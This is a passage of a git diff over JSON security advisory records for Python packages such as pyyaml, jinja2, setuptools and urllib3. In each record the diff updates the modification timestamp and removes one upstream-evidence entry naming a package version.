"BREW-ccm-CVE-2017-18342", "published": "2026-08-13T16:39:03Z", - "modified": "2026-08-13T16:39:03Z", + "modified": "2026-09-10T18:59:08Z", "upstream": [ "GHSA-rprw-h62v-c2w7", "CVE-2017-18342", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ccm-CVE-2019-20477.json b/advisories/BREW-ccm-CVE-2019-20477.json index 4d2b82bb94..622c33ef4c 100644 --- a/advisories/BREW-ccm-CVE-2019-20477.json +++ b/advisories/BREW-ccm-CVE-2019-20477.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ccm-CVE-2019-20477", "published": "2026-08-13T16:39:03Z", - "modified": "2026-08-13T16:39:03Z", + "modified": "2026-09-10T18:59:08Z", "upstream": [ "GHSA-3pqx-4fqf-j49f", "CVE-2019-20477", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ccm-CVE-2020-14343.json b/advisories/BREW-ccm-CVE-2020-14343.json index bf13084e1d..0cdf5d46ba 100644 --- a/advisories/BREW-ccm-CVE-2020-14343.json +++ b/advisories/BREW-ccm-CVE-2020-14343.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ccm-CVE-2020-14343", "published": "2026-08-13T16:39:03Z", - "modified": "2026-08-13T16:39:03Z", + "modified": "2026-09-10T18:59:08Z", "upstream": [ "GHSA-8q59-q68h-6hv4", "CVE-2020-14343", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ccm-CVE-2020-1747.json b/advisories/BREW-ccm-CVE-2020-1747.json index 4c7f018c19..53d9cd6f9a 100644 --- a/advisories/BREW-ccm-CVE-2020-1747.json +++ b/advisories/BREW-ccm-CVE-2020-1747.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ccm-CVE-2020-1747", "published": "2026-08-13T16:39:03Z", - "modified": "2026-08-13T16:39:03Z", + "modified": "2026-09-10T18:59:08Z", "upstream": [ "GHSA-6757-jp84-gxfx", "CVE-2020-1747", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ccm-CVE-2022-40897.json b/advisories/BREW-ccm-CVE-2022-40897.json index c4b5bd4b21..45be181036 100644 --- a/advisories/BREW-ccm-CVE-2022-40897.json +++ b/advisories/BREW-ccm-CVE-2022-40897.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ccm-CVE-2022-40897", "published": "2026-08-13T16:39:03Z", - "modified": "2026-08-13T16:39:03Z", + "modified": "2026-09-10T18:59:08Z", "upstream": [ "GHSA-r9hx-vwmv-q579", "BIT-setuptools-2022-40897", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "83.0.0", - "key": "pkg:pypi/setuptools@83.0.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ccm-CVE-2024-6345.json b/advisories/BREW-ccm-CVE-2024-6345.json index 59cdcf72d4..dd9d936bd1 100644 --- a/advisories/BREW-ccm-CVE-2024-6345.json +++ b/advisories/BREW-ccm-CVE-2024-6345.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ccm-CVE-2024-6345", "published": "2026-08-13T16:39:03Z", - "modified": "2026-08-13T16:39:03Z", + "modified": "2026-09-10T18:59:08Z", "upstream": [ "GHSA-cx63-2mw6-8hw5", "BIT-setuptools-2024-6345", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "83.0.0", - "key": "pkg:pypi/setuptools@83.0.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ccm-CVE-2025-47273.json b/advisories/BREW-ccm-CVE-2025-47273.json index 9e480cddbf..af61ce027a 100644 --- a/advisories/BREW-ccm-CVE-2025-47273.json +++ b/advisories/BREW-ccm-CVE-2025-47273.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ccm-CVE-2025-47273", "published": "2026-08-13T16:39:03Z", - "modified": "2026-08-13T16:39:03Z", + "modified": "2026-09-10T18:59:08Z", "upstream": [ "GHSA-5rjg-fvgr-3xxf", "BIT-setuptools-2025-47273", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "83.0.0", - "key": "pkg:pypi/setuptools@83.0.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ccm-CVE-2026-59890.json b/advisories/BREW-ccm-CVE-2026-59890.json index fa168485f9..00027f9446 100644 --- a/advisories/BREW-ccm-CVE-2026-59890.json +++ b/advisories/BREW-ccm-CVE-2026-59890.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ccm-CVE-2026-59890", "published": "2026-08-13T16:39:03Z", - "modified": "2026-08-13T16:39:03Z", + "modified": "2026-09-10T18:59:08Z", "upstream": [ "GHSA-h35f-9h28-mq5c", "BIT-setuptools-2026-59890", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "83.0.0", - "key": "pkg:pypi/setuptools@83.0.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cekit-CVE-2014-0012.json b/advisories/BREW-cekit-CVE-2014-0012.json index 69125e1800..3ea1c597e8 100644 --- a/advisories/BREW-cekit-CVE-2014-0012.json +++ b/advisories/BREW-cekit-CVE-2014-0012.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cekit-CVE-2014-0012", "published": "2026-08-13T16:39:03Z", - "modified": "2026-08-13T16:39:03Z", + "modified": "2026-09-10T18:59:08Z", "upstream": [ "GHSA-fqh9-2qgg-h84h", "CVE-2014-0012", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cekit-CVE-2014-1402.json b/advisories/BREW-cekit-CVE-2014-1402.json index 9dac14ee73..c889afb511 100644 --- a/advisories/BREW-cekit-CVE-2014-1402.json +++ b/advisories/BREW-cekit-CVE-2014-1402.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cekit-CVE-2014-1402", "published": "2026-08-13T16:39:03Z", - "modified": "2026-08-13T16:39:03Z", + "modified": "2026-09-10T18:59:08Z", "upstream": [ "GHSA-8r7q-cvjq-x353", "CVE-2014-1402", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cekit-CVE-2016-10745.json b/advisories/BREW-cekit-CVE-2016-10745.json index ed0e54337b..6f58d1628f 100644 --- a/advisories/BREW-cekit-CVE-2016-10745.json +++ b/advisories/BREW-cekit-CVE-2016-10745.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cekit-CVE-2016-10745", "published": "2026-08-13T16:39:03Z", - "modified": "2026-08-13T16:39:03Z", + "modified": "2026-09-10T18:59:08Z", "upstream": [ "GHSA-hj2j-77xm-mc5v", "CVE-2016-10745", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cekit-CVE-2017-18342.json b/advisories/BREW-cekit-CVE-2017-18342.json index b799e20e81..1a0566a96e 100644 --- a/advisories/BREW-cekit-CVE-2017-18342.json +++ b/advisories/BREW-cekit-CVE-2017-18342.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cekit-CVE-2017-18342", "published": "2026-08-13T16:39:03Z", - "modified": "2026-08-13T16:39:03Z", + "modified": "2026-09-10T18:59:08Z", "upstream": [ "GHSA-rprw-h62v-c2w7", "CVE-2017-18342", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cekit-CVE-2019-10906.json b/advisories/BREW-cekit-CVE-2019-10906.json index 7a60aa0d9e..cf89dfc44f 100644 --- a/advisories/BREW-cekit-CVE-2019-10906.json +++ b/advisories/BREW-cekit-CVE-2019-10906.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cekit-CVE-2019-10906", "published": "2026-08-13T16:39:03Z", - "modified": "2026-08-13T16:39:03Z", + "modified": "2026-09-10T18:59:08Z", "upstream": [ "GHSA-462w-v97r-4m45", "CVE-2019-10906", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cekit-CVE-2019-20477.json b/advisories/BREW-cekit-CVE-2019-20477.json index 0988040c30..01791a5281 100644 --- a/advisories/BREW-cekit-CVE-2019-20477.json +++ b/advisories/BREW-cekit-CVE-2019-20477.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cekit-CVE-2019-20477", "published": "2026-08-13T16:39:03Z", - "modified": "2026-08-13T16:39:03Z", + "modified": "2026-09-10T18:59:08Z", "upstream": [ "GHSA-3pqx-4fqf-j49f", "CVE-2019-20477", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cekit-CVE-2020-14343.json b/advisories/BREW-cekit-CVE-2020-14343.json index d96f663060..494cb4a35f 100644 --- a/advisories/BREW-cekit-CVE-2020-14343.json +++ b/advisories/BREW-cekit-CVE-2020-14343.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cekit-CVE-2020-14343", "published": "2026-08-13T16:39:03Z", - "modified": "2026-08-13T16:39:03Z", + "modified": "2026-09-10T18:59:08Z", "upstream": [ "GHSA-8q59-q68h-6hv4", "CVE-2020-14343", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cekit-CVE-2020-1747.json b/advisories/BREW-cekit-CVE-2020-1747.json index 7927d7e269..78268421e3 100644 --- a/advisories/BREW-cekit-CVE-2020-1747.json +++ b/advisories/BREW-cekit-CVE-2020-1747.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cekit-CVE-2020-1747", "published": "2026-08-13T16:39:03Z", - "modified": "2026-08-13T16:39:03Z", + "modified": "2026-09-10T18:59:08Z", "upstream": [ "GHSA-6757-jp84-gxfx", "CVE-2020-1747", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cekit-CVE-2020-28493.json b/advisories/BREW-cekit-CVE-2020-28493.json index 9fbb73fd16..1a37b91c69 100644 --- a/advisories/BREW-cekit-CVE-2020-28493.json +++ b/advisories/BREW-cekit-CVE-2020-28493.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cekit-CVE-2020-28493", "published": "2026-08-13T16:39:03Z", - "modified": "2026-08-13T16:39:03Z", + "modified": "2026-09-10T18:59:08Z", "upstream": [ "GHSA-g3rq-g295-4j3m", "CVE-2020-28493", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cekit-CVE-2024-22195.json b/advisories/BREW-cekit-CVE-2024-22195.json index da53192d3e..7480ad0fa1 100644 --- a/advisories/BREW-cekit-CVE-2024-22195.json +++ b/advisories/BREW-cekit-CVE-2024-22195.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cekit-CVE-2024-22195", "published": "2026-08-13T16:39:03Z", - "modified": "2026-08-13T16:39:03Z", + "modified": "2026-09-10T18:59:08Z", "upstream": [ "GHSA-h5c8-rqwp-cp95", "CVE-2024-22195", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cekit-CVE-2024-34064.json b/advisories/BREW-cekit-CVE-2024-34064.json index 8f1382d6fc..5787521773 100644 --- a/advisories/BREW-cekit-CVE-2024-34064.json +++ b/advisories/BREW-cekit-CVE-2024-34064.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cekit-CVE-2024-34064", "published": "2026-08-13T16:39:03Z", - "modified": "2026-08-13T16:39:03Z", + "modified": "2026-09-10T18:59:08Z", "upstream": [ "GHSA-h75v-3vvj-5mfj", "CVE-2024-34064", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cekit-CVE-2024-56201.json b/advisories/BREW-cekit-CVE-2024-56201.json index 0fdc5527de..0bc1f34309 100644 --- a/advisories/BREW-cekit-CVE-2024-56201.json +++ b/advisories/BREW-cekit-CVE-2024-56201.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cekit-CVE-2024-56201", "published": "2026-08-13T16:39:03Z", - "modified": "2026-08-13T16:39:03Z", + "modified": "2026-09-10T18:59:08Z", "upstream": [ "GHSA-gmj6-6f8f-6699", "CVE-2024-56201", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cekit-CVE-2024-56326.json b/advisories/BREW-cekit-CVE-2024-56326.json index 613bacd78c..53a1385eab 100644 --- a/advisories/BREW-cekit-CVE-2024-56326.json +++ b/advisories/BREW-cekit-CVE-2024-56326.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cekit-CVE-2024-56326", "published": "2026-08-13T16:39:03Z", - "modified": "2026-08-13T16:39:03Z", + "modified": "2026-09-10T18:59:08Z", "upstream": [ "GHSA-q2x7-8rv6-6q7h", "CVE-2024-56326", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cekit-CVE-2025-27516.json b/advisories/BREW-cekit-CVE-2025-27516.json index 83382d6c8c..93f10308cc 100644 --- a/advisories/BREW-cekit-CVE-2025-27516.json +++ b/advisories/BREW-cekit-CVE-2025-27516.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cekit-CVE-2025-27516", "published": "2026-08-13T16:39:03Z", - "modified": "2026-08-13T16:39:03Z", + "modified": "2026-09-10T18:59:08Z", "upstream": [ "GHSA-cpwx-vrp4-4pq7", "CVE-2025-27516", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2011-4617.json b/advisories/BREW-cloudiscovery-CVE-2011-4617.json index 28af3eb98a..061b5ea649 100644 --- a/advisories/BREW-cloudiscovery-CVE-2011-4617.json +++ b/advisories/BREW-cloudiscovery-CVE-2011-4617.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2011-4617", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-3jhc-wjqf-5f2c", "CVE-2011-4617", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "virtualenv", - "subject_version": "20.31.2", - "key": "pkg:pypi/virtualenv@20.31.2", - "resource": "virtualenv" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2014-0012.json b/advisories/BREW-cloudiscovery-CVE-2014-0012.json index bffd89baf5..2bafe6f748 100644 --- a/advisories/BREW-cloudiscovery-CVE-2014-0012.json +++ b/advisories/BREW-cloudiscovery-CVE-2014-0012.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2014-0012", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-fqh9-2qgg-h84h", "CVE-2014-0012", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "2.11.3", - "key": "pkg:pypi/jinja2@2.11.3", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2014-1402.json b/advisories/BREW-cloudiscovery-CVE-2014-1402.json index 610f0f35c2..be775f8188 100644 --- a/advisories/BREW-cloudiscovery-CVE-2014-1402.json +++ b/advisories/BREW-cloudiscovery-CVE-2014-1402.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2014-1402", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-8r7q-cvjq-x353", "CVE-2014-1402", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "2.11.3", - "key": "pkg:pypi/jinja2@2.11.3", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2016-10745.json b/advisories/BREW-cloudiscovery-CVE-2016-10745.json index 70b42fcdaf..f097201a17 100644 --- a/advisories/BREW-cloudiscovery-CVE-2016-10745.json +++ b/advisories/BREW-cloudiscovery-CVE-2016-10745.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2016-10745", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-hj2j-77xm-mc5v", "CVE-2016-10745", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "2.11.3", - "key": "pkg:pypi/jinja2@2.11.3", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2016-9015.json b/advisories/BREW-cloudiscovery-CVE-2016-9015.json index d749980fc1..6e26287d30 100644 --- a/advisories/BREW-cloudiscovery-CVE-2016-9015.json +++ b/advisories/BREW-cloudiscovery-CVE-2016-9015.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2016-9015", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-v4w5-p2hg-8fh6", "CVE-2016-9015", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.5.0", - "key": "pkg:pypi/urllib3@2.5.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2017-18342.json b/advisories/BREW-cloudiscovery-CVE-2017-18342.json index 2718c898ff..520b1e18e5 100644 --- a/advisories/BREW-cloudiscovery-CVE-2017-18342.json +++ b/advisories/BREW-cloudiscovery-CVE-2017-18342.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2017-18342", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-rprw-h62v-c2w7", "CVE-2017-18342", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.2", - "key": "pkg:pypi/pyyaml@6.0.2", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2018-20060.json b/advisories/BREW-cloudiscovery-CVE-2018-20060.json index e187e0c69f..25c4fdcc63 100644 --- a/advisories/BREW-cloudiscovery-CVE-2018-20060.json +++ b/advisories/BREW-cloudiscovery-CVE-2018-20060.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2018-20060", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-www2-v7xj-xrc6", "CVE-2018-20060", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.5.0", - "key": "pkg:pypi/urllib3@2.5.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2018-25091.json b/advisories/BREW-cloudiscovery-CVE-2018-25091.json index b11b752fec..dccc6b75a9 100644 --- a/advisories/BREW-cloudiscovery-CVE-2018-25091.json +++ b/advisories/BREW-cloudiscovery-CVE-2018-25091.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2018-25091", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-gwvm-45gx-3cf8", "CVE-2018-25091", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.5.0", - "key": "pkg:pypi/urllib3@2.5.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2019-10906.json b/advisories/BREW-cloudiscovery-CVE-2019-10906.json index ca38d9707d..8974265aa3 100644 --- a/advisories/BREW-cloudiscovery-CVE-2019-10906.json +++ b/advisories/BREW-cloudiscovery-CVE-2019-10906.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2019-10906", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-462w-v97r-4m45", "CVE-2019-10906", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "2.11.3", - "key": "pkg:pypi/jinja2@2.11.3", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2019-11236.json b/advisories/BREW-cloudiscovery-CVE-2019-11236.json index c41d0b7ea5..9c7e436055 100644 --- a/advisories/BREW-cloudiscovery-CVE-2019-11236.json +++ b/advisories/BREW-cloudiscovery-CVE-2019-11236.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2019-11236", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-r64q-w8jr-g9qp", "CVE-2019-11236", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.5.0", - "key": "pkg:pypi/urllib3@2.5.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2019-11324.json b/advisories/BREW-cloudiscovery-CVE-2019-11324.json index 9c274590bc..78e58343aa 100644 --- a/advisories/BREW-cloudiscovery-CVE-2019-11324.json +++ b/advisories/BREW-cloudiscovery-CVE-2019-11324.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2019-11324", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-mh33-7rrq-662w", "CVE-2019-11324", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.5.0", - "key": "pkg:pypi/urllib3@2.5.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2019-20477.json b/advisories/BREW-cloudiscovery-CVE-2019-20477.json index 82c0073579..ae97a6237d 100644 --- a/advisories/BREW-cloudiscovery-CVE-2019-20477.json +++ b/advisories/BREW-cloudiscovery-CVE-2019-20477.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudiscovery-CVE-2019-20477", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-13T16:40:09Z", + "modified": "2026-09-10T19:01:16Z", "upstream": [ "GHSA-3pqx-4fqf-j49f", "CVE-2019-20477", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.2", - "key": "pkg:pypi/pyyaml@6.0.2", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-cloudiscovery-CVE-2020-14343.json b/advisories/BREW-cloudiscovery-CVE-2020-14343.json index 2d8929c46a..c46be6b048 100644 --- a/advisories/BREW-cloudiscovery-CVE-2020-14343.json +++ 